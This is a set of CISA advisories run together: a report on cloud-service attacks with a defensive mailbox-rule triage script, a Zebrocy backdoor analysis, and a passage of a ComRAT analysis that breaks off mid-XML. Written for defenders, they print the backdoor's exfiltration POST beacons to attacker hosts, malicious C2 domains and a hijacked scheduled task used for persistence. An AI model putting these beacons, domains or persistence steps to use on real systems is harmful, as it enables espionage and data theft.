
Original release date: January 13, 2021

Summary

This Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of several recent successful cyberattacks against various organizations’ cloud services. Threat actors are using phishing and other vectors to exploit poor cyber hygiene practices in victims’ cloud services configurations. The information in this report is derived exclusively from several CISA incident response engagements. It provides the tactics, techniques, and procedures and the indicators of compromise (IOCs) that CISA observed during those engagements, together with recommended mitigations that organizations can use to strengthen their cloud environment configuration to protect against, detect, and respond to potential attacks.

For a downloadable copy of IOCs, see AR21-013A.stix.

Note: the activity and information in this Analysis Report are not explicitly tied to any one threat actor, nor known to be specifically associated with the advanced persistent threat actor attributed with the compromise of SolarWinds Orion Platform software and other recent activity.

Description

Background

These types of attacks frequently occurred when victim organizations’ employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services. Despite the use of security tools, affected organizations typically had weak cyber hygiene practices that allowed threat actors to conduct successful attacks.

Technical Details

The cyber threat actors involved in these attacks used a variety of tactics and techniques—including phishing, brute force login attempts, and possibly a “pass-the-cookie” attack—to attempt to exploit weaknesses in the victim organizations’ cloud security practices.

Phishing

CISA observed cyber threat actors using phishing emails with malicious links to harvest credentials for users’ cloud service accounts (Phishing: Spearphishing Link [T1566.002]). The cyber actors designed emails that included a link to what appeared to be a secure message and also emails that looked like a legitimate file hosting service account login. After a targeted recipient provided their credentials, the threat actors then used the stolen credentials to gain Initial Access [TA0001] to the user’s cloud service account (Valid Accounts [T1078]). CISA observed the actors’ logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location). The actors then sent emails from the user’s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization’s file hosting service.

In one case, an organization did not require a virtual private network (VPN) for accessing the corporate network. Although their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it—leaving the organization’s network vulnerable. The threat actor attempted to exploit this by launching brute force login attempts (Brute Force [T1110]).

Forwarding Rules

In several engagements, CISA observed threat actors collecting sensitive information by taking advantage of email forwarding rules, which users had set up to forward work emails to their personal email accounts (Email Collection: Email Forwarding Rule [T1114.003]).

Modified Forwarding

In one case, CISA determined that the threat actors modified an existing email rule on a user’s account—originally set by the user to forward emails sent from a certain sender to a personal account—to redirect the emails to an account controlled by the actors. The threat actors updated the rule to forward all email to the threat actors’ accounts.

Keyword Search Rule

Threat actors also modified existing rules to search users’ email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors’ account.

New Rule Creation and Forwarding

In addition to modifying existing user email rules, the threat actors created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users’ Really Simple Syndication (RSS) Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.
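To make the three rule patterns described above auditable, here is an added example (not CISA's code) that triages mailbox rules exported in the Microsoft Graph messageRule shape, which carries the same properties Get-InboxRule reports; the organization domain, the folder map and the rules themselves are constructed for the example.

```python
# Constructed input in the Microsoft Graph messageRule shape (the same properties
# Get-InboxRule reports); the domain, folder map and rules are made up for this example.
ORG_DOMAIN = "example.org"
FOLDER_NAMES = {                      # mailFolder id -> displayName, as a folder listing would give
    "AAMkAD-rss": "RSS Feeds",
    "AAMkAD-inbox": "Inbox",
}
SAMPLE_RULES = [
    {   # existing vendor rule, repointed to an external mailbox ("Modified Forwarding")
        "displayName": "Invoices from vendor",
        "isEnabled": True,
        "conditions": {"senderContains": ["billing@vendor.test"]},
        "actions": {"redirectTo": [{"emailAddress": {"address": "collector@drop.test"}}]},
    },
    {   # finance keywords, misspelled as in the report, forwarded out ("Keyword Search Rule")
        "displayName": "finance",
        "isEnabled": True,
        "conditions": {"bodyOrSubjectContains": ["invoce", "paymnt", "wire transfer"]},
        "actions": {"forwardTo": [{"emailAddress": {"address": "collector@drop.test"}}]},
    },
    {   # phishing warnings buried in the RSS folder ("New Rule Creation and Forwarding")
        "displayName": "cleanup",
        "isEnabled": True,
        "conditions": {"bodyOrSubjectContains": ["phishing", "suspicious", "hacked"]},
        "actions": {"moveToFolder": "AAMkAD-rss", "markAsRead": True},
    },
    {   # benign internal rule
        "displayName": "team updates",
        "isEnabled": True,
        "conditions": {"senderContains": ["newsletter@example.org"]},
        "actions": {"moveToFolder": "AAMkAD-inbox"},
    },
]

FORWARD_ACTIONS = ("forwardTo", "forwardAsAttachmentTo", "redirectTo")
HIDE_FOLDERS = ("rss feeds", "rss subscriptions", "deleted items", "junk email")


def external_recipients(rule, org_domain=ORG_DOMAIN):
    """Addresses that any forward/redirect action of this rule sends outside org_domain."""
    out = []
    for action in FORWARD_ACTIONS:
        for rcpt in rule.get("actions", {}).get(action, []):
            addr = rcpt.get("emailAddress", {}).get("address", "")
            if not addr.lower().endswith("@" + org_domain.lower()):
                out.append(addr)
    return out


def triage_rule(rule, org_domain=ORG_DOMAIN, folder_names=FOLDER_NAMES):
    """Findings for one rule; an empty list means nothing notable."""
    findings = []
    if not rule.get("isEnabled", True):
        return findings                      # disabled rules are noise; keep them in the export
    keywords = rule.get("conditions", {}).get("bodyOrSubjectContains", [])
    actions = rule.get("actions", {})
    ext = external_recipients(rule, org_domain)
    if ext:
        findings.append("external-forward:" + ",".join(ext))
        if keywords:                         # content-triggered exfiltration of selected mail
            findings.append("keyword-forward:" + ",".join(keywords))
    folder = folder_names.get(actions.get("moveToFolder", ""), "").lower()
    if folder in HIDE_FOLDERS and keywords:  # selected mail routed where the user will not look
        findings.append("keyword-hidden-in:" + folder)
    if actions.get("delete") and keywords:
        findings.append("keyword-delete")
    return findings


def triage(rules, org_domain=ORG_DOMAIN, folder_names=FOLDER_NAMES):
    """Map displayName -> findings for every rule that has at least one finding."""
    result = {}
    for rule in rules:
        found = triage_rule(rule, org_domain, folder_names)
        if found:
            result[rule.get("displayName", "")] = found
    return result


if __name__ == "__main__":
    for name, found in triage(SAMPLE_RULES).items():
        print(f"{name!r}: {found}")
```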

Authentication

CISA verified that the threat actors successfully signed into one user’s account with proper multi-factor authentication (MFA). In this case, CISA believes the threat actors may have used browser cookies to defeat MFA with a “pass-the-cookie” attack (Use Alternate Authentication Material: Web Session Cookie [T1550.004]).

The threat actors attempted brute force logins (Brute Force [T1110]) on some accounts. However, this activity was not successful. This thwarted attempt was due, in part, to the threat actors not guessing a correct username/password combination, as well as the organization’s use of MFA to access their cloud environment.

Solution

CISA recommends the following steps for organizations to strengthen their cloud security practices.

  • Implement conditional access (CA) policies based upon your organization’s needs.
  • Establish a baseline for normal network activity within your environment.
  • Routinely review both Active Directory sign-in logs and unified audit logs for anomalous activity.
  • Enforce MFA.
  • Routinely review user-created email forwarding rules and alerts, or restrict forwarding.
  • Have a mitigation plan or procedures in place; understand when, how, and why to reset passwords and to revoke session tokens.
  • Follow recommended guidance on securing privileged access.
  • Consider a policy that does not allow employees to use personal devices for work. At a minimum, use a trusted mobile device management solution.
  • Resolve client site requests internal to your network.
  • Consider restricting users from forwarding emails to accounts outside of your domain.
  • Allow users to consent only to app integrations that have been pre-approved by an administrator.
  • Audit email rules with enforceable alerts via the Security and Compliance Center or other tools that use the Graph API to warn administrators of abnormal activity.
  • Implement MFA for all users, without exception.
  • Conditional access should be understood and implemented with a zero-trust mindset.
  • Ensure user access logging is enabled. Forward logs to a security information and event management appliance for aggregation and monitoring so as to not lose visibility on logs outside of logging periods.
  • Use a CA policy to block legacy authentication protocols.
  • Verify that all cloud-based virtual machine instances with a public IP do not have open Remote Desktop Protocol (RDP) ports. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.
  • Focus on awareness and training. Make employees aware of the threats—such as phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
  • Establish blame-free employee reporting and ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.
  • Ensure existing built-in filtering and detection products (e.g., those for spam, phishing, malware, and safe attachments and links) are enabled.
  • Organizations using M365 should also consider the following steps.
    • Assign a few (one to three) trusted users as electronic discovery (or eDiscovery) managers to conduct forensic content searches across the entire M365 environment (Mailboxes, Teams, SharePoint, and OneDrive) for evidence of malicious activity.
    • Disable PowerShell remoting to Exchange Online for regular M365 users. Disabling for non-administrative users will lower the likelihood of a compromised user account being used to programmatically access tenant configurations for reconnaissance.
    • Do not allow an unlimited amount of unsuccessful login attempts. To configure these settings, see password smart lockout configuration and sign-in activity reports.
    • Consider using a tool such as Sparrow or Hawk—open-source PowerShell-based tools used to gather information related to M365—to investigate and audit intrusions and potential breaches.[1][2]

Resources

References

Revisions

  • January 13, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 29, 2020

Description

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as Zebrocy, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduce exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

Two Windows executables identified as a new variant of the Zebrocy backdoor were submitted for analysis. Both files are designed to allow a remote operator to perform various functions on the compromised system.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10310246-1.v1.

Submitted Files (2)

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1 (smqft_exe)

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8 (sespmw_exe)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

backdoor

Details
Name smqft_exe
Size 4307968 bytes
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 ba9c59783b52b93aa6dfd4cfffc16f2b
SHA1 ee6753448c3960e8f7ba325a2c00009c31615fd2
SHA256 0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1
SHA512 bd9e059a9d8fc7deffd12908c01c7c53fbfa9af95296365aa28080d89a668e9eed9c2770ba952cf0174f464dc93e410c92dfdbbaa7bee9f4772affd0c55dee1c
ssdeep 49152:vATdsrWzBmMmRytymPIcGkJGUAErdu5Pp6oUlMXH85jHuXJfZLJC23:gYYBmMdEsx5gDXgHuTLJ
Entropy 6.196940
Antivirus
BitDefender Gen:Variant.Babar.17722
Emsisoft Gen:Variant.Babar.17722 (B)
Lavasoft Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 1969-12-31 19:00:00-05:00
Import Hash 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5 Name Raw Size Entropy
b6114d2ef9c71d56d934ad743f66d209 header 1024 2.184050
0ead1c8fd485e916e3564c37083fb754 .text 1952256 6.048645
a5a4f98bad8aefba03b1fd8efa3e8668 .data 196096 5.841971
96bfb1a9a7e45816c45b7d7c1bf3c578 .rdata 2153984 5.690400
916cd27c0226ce956ed74ddf600a3a94 .eh_fram 1024 4.244370
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
1f825370fd049566e1e933455eb0cd06 .idata 2560 4.462264
486c39eb96458f6f5bdb80d71bb0f828 .CRT 512 0.118370
aa692f6a7441edad64447679b7d321e8 .tls 512 0.224820
Description

This file is a 32-bit Windows executable written in the Go (Golang) programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is expected to be an Exclusive OR (XOR) and hexadecimal encoded Uniform Resource Identifier (URI); it can also run using a plaintext URI.

Displayed below is a sample plaintext argument used by the malware:

--Begin arguments--
Domain: malware.exe <Domain>
or
IP: malware.exe <IP address:Port>
--End arguments--

When executed, it will encrypt the URI using an Advanced Encryption Standard (AES)-128 Electronic Code Book (ECB) algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into "%AppData%\Roaming\Personalization\EUDC\Policies\3030304332393839394630353537343934453244".

It also collects information about the victim’s system such as username, 6 bytes of current user’s Security Identifiers (SID), and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI:

--Begin POST requests--

--Begin POST request sample--
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Accept-Encoding: gzip

--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--
--End POST request sample--

--Begin POST request sample--
POST / HTTP/1.1
Host: <IP address>:<Port>
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Accept-Encoding: gzip

--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--44f47dd373e3a0a0afc00d92bba90bc09c7add1bcf4074de385fd04d1108--
--End POST request sample--

--End POST requests--

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create scheduled task for persistence
–End functions–

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details
Name sespmw_exe
Size 4313600 bytes
Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e8596fd7a15ecc86abbbfdea17a9e73a
SHA1 be07f6a2c9d36a7e9c4d48f21e13e912e6271d83
SHA256 2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8
SHA512 4a2125a26467ea4eb913abe80a59a85f3341531d634766fccabd14eb8ae1a3e7ee77162df7d5fac362272558db5a6e18f84ce193296fcdfb790e44a52fabe02a
ssdeep 49152:J8IkRvcuFh9fQgnf/1th+jrR7PNrNdbMFvm6oUlMXycR+Z5drM0us4:UJHFh91fFg/+MX9RgY0u
Entropy 6.197768
Antivirus
BitDefender Gen:Variant.Babar.17722
Emsisoft Gen:Variant.Babar.17722 (B)
Lavasoft Gen:Variant.Babar.17722
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 1970-01-04 14:01:20-05:00
Import Hash 20acdf581665d0a5acf497c2fe5e0662
PE Sections
MD5 Name Raw Size Entropy
2ebbe6c38d9e8d4da2449cc05f78054a header 1024 2.198390
a7c0885448e7013e05bf5ff61b673949 .text 1954816 6.046127
9bf966747acfa91eea3d6a1ef17cc30f .data 196096 5.843286
31182660fce8ae07d0350ebe456b9179 .rdata 2157056 5.696834
9eeb1eeb42e99c54c6429f9122285336 .eh_fram 1024 4.292769
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
0bc884e39b3ba72fb113d63988590b5c .idata 2560 4.424718
9bbfafc74bc296cd99dc8307ffe120ac .CRT 512 0.114463
2b60c482048e4a03fbb82db9c3416db5 .tls 512 0.224820
Description

This file is a 32-bit Windows executable written in the Go (Golang) programming language. The file has been identified as a new variant of the Zebrocy backdoor. The file takes an argument that is expected to be an XOR and hexadecimal encoded URI. Unlike the other Zebrocy backdoor binary, “ba9c59783b52b93aa6dfd4cfffc16f2b”, this file cannot run using a plaintext URI. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into "%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244".

It also collects information about the victim’s system such as username, 6 bytes of the current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before being exfiltrated using the predefined URI.

--Begin POST request--
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name="filename"; filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"
Content-Type: application/octet-stream

1
--0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db--
--End POST request--
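As an added example that is not part of the MAR, the following parses the beacon request shown in the POST samples for both Zebrocy binaries and applies the shape check a network-detection rule would use; the host name and CRLF framing are constructed, while the boundary and filename are taken from the first sample above.

```python
from email.parser import Parser

# Constructed sample: the beacon from the report's first POST sample, with a placeholder
# host in place of www.<domain>.com and CRLF framing as it would appear on the wire.
SAMPLE_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: www.example-placeholder.test\r\n"
    "User-Agent: Go-http-client/1.1\r\n"
    "Content-Length: 297\r\n"
    "Content-Type: multipart/form-data; "
    "boundary=ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
    "--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228\r\n"
    'Content-Disposition: form-data; name="filename"; '
    'filename="04760175017f0d0d7f7706067302007f0573010204007134463136334635"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "1\r\n"
    "--ac3d81244405bbbc958b22a748770ad10f9edd7be9946ccfd5b7bb1cc228--\r\n"
)
HEX_CHARS = set("0123456789abcdefABCDEF")


def parse_request(raw):
    """Split an HTTP/1.1 request into (method, target, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def multipart_parts(headers, body):
    """Return [(name, filename, payload)] for a multipart/form-data body; [] if not multipart."""
    ctype = headers.get("content-type", "")
    # The stdlib MIME parser handles multipart/* bodies once it sees the Content-Type line.
    msg = Parser().parsestr("Content-Type: " + ctype + "\r\n\r\n" + body)
    if not msg.is_multipart():
        return []
    parts = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        fname = part.get_param("filename", header="content-disposition")
        parts.append((name, fname, part.get_payload().strip()))
    return parts


def looks_like_zebrocy_beacon(raw):
    """Shape check for the beacon above: a POST with a Go-http-client User-Agent carrying one
    octet-stream part named "filename" whose filename is a bare hex string (the encrypted,
    hex-encoded victim record) and whose payload is the single character "1"."""
    method, _target, headers, body = parse_request(raw)
    if method != "POST" or not headers.get("user-agent", "").startswith("Go-http-client/"):
        return False
    for name, fname, payload in multipart_parts(headers, body):
        is_hex = bool(fname) and len(fname) % 2 == 0 and set(fname) <= HEX_CHARS
        if name == "filename" and is_hex and payload == "1":
            return True
    return False


def beacon_record(raw):
    """Hex-decode the filename field so the encrypted victim record can be kept as evidence."""
    _method, _target, headers, body = parse_request(raw)
    for name, fname, _payload in multipart_parts(headers, body):
        if name == "filename" and fname:
            return bytes.fromhex(fname)
    return b""


if __name__ == "__main__":
    print(looks_like_zebrocy_beacon(SAMPLE_REQUEST), beacon_record(SAMPLE_REQUEST).hex())
```

The same check matches the IP-addressed form of the beacon, since only the Host header differs between the two samples.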

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create a scheduled task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • October 29, 2020: Initial Version


Original release date: October 29, 2020

Description


Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduce exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

FBI has high confidence that Russian-sponsored APT actor Turla, an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.

This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim system’s default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/

For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.

Submitted Files (5)

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)

Domains (6)

branter.tk

bronerg.tk

crusider.tk

duke6.tk

sanitar.ml

wekanda.tk

Findings

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

Tags

dropper

Details
Name corrected.ps1
Size 4345430 bytes
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators
MD5 65419948186842f8f3ef07cafb71f59a
SHA1 93537b0814177e2101663306aa17332b9303e08a
SHA256 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
SHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4f8b7ea5f90
ssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs
Entropy 4.004402
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into the registry on the victim system. This malicious script also modifies the following scheduled task on the victim’s system:

--Begin Modified Scheduled Task--
C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator
--End Modified Scheduled Task--

The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task:

--Begin Original Scheduled Task--
<?xml version="1.0" encoding="UTF-16"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
   <Version>1.0</Version>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
   <Source>$(@%systemRoot%\system32\wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%\system32\wsqmcons.exe,-108)</Author>
   <Description>$(@%systemRoot%\system32\wsqmcons.exe,-107)</Description>
   <URI>\Microsoft\Windows\Customer Experience Improvement Program\Consolidator</URI>
</RegistrationInfo>
<Principals>
   <Principal id="WinSQMAccount">
    <UserId>S-1-5-18</UserId>
   </Principal>
</Principals>
<Settings>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <StartWhenAvailable>true</StartWhenAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition>
       <Interval>PT6H</Interval>
    </Repetition>
   </TimeTrigger>
</Triggers>
<Actions Context="WinSQMAccount">
   <Exec>
    <Command>%SystemRoot%\System32\wsqmcons.exe</Command>
   </Exec>
</Actions>
</Task>
--End Original Scheduled Task--

The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:

--Begin Modified Scheduled Task--
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
   <Source>$(@%systemRoot%\system32\wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%\system32\wsqmcons.exe,-108)</Author>
   <Version>1.0</Version>
   <Description>$(@%systemRoot%\system32\wsqmcons.exe,-107)</Description>
   <URI>\Microsoft\Windows\Customer Experience Improvement Program\Consolidator</URI>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
   <TimeTrigger>
    <Repetition>
       <Interval>PT6H</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
    </Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger>
    <Enabled>true</Enabled>
   </LogonTrigger>
</Triggers>
<Principals>
   <Principal id="WinSQMAccount">
    <RunLevel>LeastPrivilege</RunLevel>
    <UserId>SYSTEM</UserId>
   </Principal>
</Principals>
<Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>true</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
